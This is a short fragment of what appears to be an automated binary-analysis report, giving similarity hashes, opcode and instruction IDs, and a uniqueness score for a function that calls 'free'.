                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: 6ff657cb843d304aaa61e28a697a6e84686e4a2c000e04354a40c192b77be9a1
                            • Instruction ID: b7dabcaea21dbd9d9efadb7c893dff8fa79c6163e27d86b480c43cac8284f7a5
                            • Opcode Fuzzy Hash: 6ff657cb843d304aaa61e28a697a6e84686e4a2c000e04354a40c192b77be9a1
                            • Instruction Fuzzy Hash: AD118E32A15A4186EB14EF12E184378B370FB84B84F544635CB2D4B7ADDFB8E461D390
                            Uniqueness

                            Uniqueness Score: -1.00%